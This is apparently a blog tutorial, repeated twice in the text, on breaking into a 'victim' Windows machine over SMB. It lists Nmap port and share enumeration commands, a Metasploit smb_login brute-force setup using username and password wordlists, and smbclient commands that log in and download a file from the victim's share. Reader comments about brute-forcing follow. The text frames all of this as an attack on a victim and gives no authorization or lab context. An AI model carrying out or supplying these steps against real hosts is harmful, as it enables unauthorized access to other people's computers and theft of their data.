Exploit Samba "SmbClient"
Such as FTP (File Transfer Protocol) samba include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.
in this case we have to get the victim to allow shared folders or files.
Equipments :
1. SmbClient
2. Nmap
3. Metasploit
The firstStep. scanning port the victim's ip-address using Nmap.
in here that we need right port is port 445 microsoft-ds.
seen in the picture above. I am lucky :)
now, let us look the contents of the port
--script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139).
seen in the picture above, it turns out the victim we use Operating System Windows 7 Ultimate.
Computer Name And NetBIOS Name is a ANONYMOUS-PC.
now, See the documentation for the smb library.
seen above, the victim has a shared folder =))
seems this exploitation will work =))
Now, run a SmbClient.
damn >_<, we are prompted to enter a password, how do we get the password, it will be impossible to succeed by guessing passwords owned by the victim.
I will not give up, let's proceed with metasploit ^ _ ^
yeah, i'm succeeded to get the password :)
now, we back to login for get a list of shares available on a host
^_^
Now, we try to access an existing disk C on the victim's computer
Failed ??? Status Bad For Network Name.
try to access an existing disk Smb-Shares on the victim's computer
Success :)
then I download a file that is in the folder
And its results are
Regards
Hidemichi-Hiroyuki a.k.a [H2]
in this case we have to get the victim to allow shared folders or files.
Equipments :
1. SmbClient
2. Nmap
3. Metasploit
The firstStep. scanning port the victim's ip-address using Nmap.
in here that we need right port is port 445 microsoft-ds.
# Nmap (Victim Ip-Address)
seen in the picture above. I am lucky :)
now, let us look the contents of the port
# nmap -p445 --script=smb-os-discovery (Victim Ip-Address)
--script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139).
seen in the picture above, it turns out the victim we use Operating System Windows 7 Ultimate.
Computer Name And NetBIOS Name is a ANONYMOUS-PC.
now, See the documentation for the smb library.
# nmap -p445 --script=smb-enum-shares (Victim Ip-Address)
seen above, the victim has a shared folder =))
seems this exploitation will work =))
Now, run a SmbClient.
# smbclient -L (Victim Ip-Address) -U (Computer Name) -p (port 445)
damn >_<, we are prompted to enter a password, how do we get the password, it will be impossible to succeed by guessing passwords owned by the victim.
I will not give up, let's proceed with metasploit ^ _ ^
# msfconsole
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary (smb_login) > set RHOSTS Victim Ip-Address (Range)
msf auxiliary (smb_login) > set PASS_FILE /Path/Your/Password_wordlist/*.txt
msf auxiliary (smb_login) > set USER_FILE /Path/Your/Username_wordlist/*.txt
msf auxiliary (smb_login) > run
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary (smb_login) > set RHOSTS Victim Ip-Address (Range)
msf auxiliary (smb_login) > set PASS_FILE /Path/Your/Password_wordlist/*.txt
msf auxiliary (smb_login) > set USER_FILE /Path/Your/Username_wordlist/*.txt
msf auxiliary (smb_login) > run
yeah, i'm succeeded to get the password :)
now, we back to login for get a list of shares available on a host
# smbclient -L (Victim Ip-Address) -U (Computer Name) -p (port 445)
^_^
Now, we try to access an existing disk C on the victim's computer
# smbclient //Victim Ip-Address/C -U (Computer Name) -p (Port 445)
Failed ??? Status Bad For Network Name.
try to access an existing disk Smb-Shares on the victim's computer
# smbclient //Victim Ip-Address//Smb-Shares -U (Computer Name) -p (Port 445)
Success :)
then I download a file that is in the folder
smb: \> get Smb-Shared-file.txt
And its results are
Regards
Hidemichi-Hiroyuki a.k.a [H2]
harus memiliki wordlist ya?
ReplyDeletewordlist oh wordlist, paling males kalo harus brute force
ReplyDeleteThis Bruterforce dude ;)
ReplyDelete